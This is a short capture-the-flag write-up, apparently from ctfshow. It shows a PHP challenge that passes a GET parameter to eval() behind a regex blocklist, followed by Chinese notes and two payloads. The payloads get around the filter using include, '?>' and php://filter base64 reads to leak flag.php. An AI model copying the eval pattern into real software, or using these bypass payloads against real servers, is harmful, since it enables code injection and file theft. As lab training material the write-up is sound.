<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}
过滤了flag,system,php,cat,sort,shell,., ,',```,echo,;,(
//特地说明,;可以用?>绕过
大部分基本都过滤了,这里可以考虑使用文件包含绕过
方案一
?c=include$_GET["a"]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
方案二
/?c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
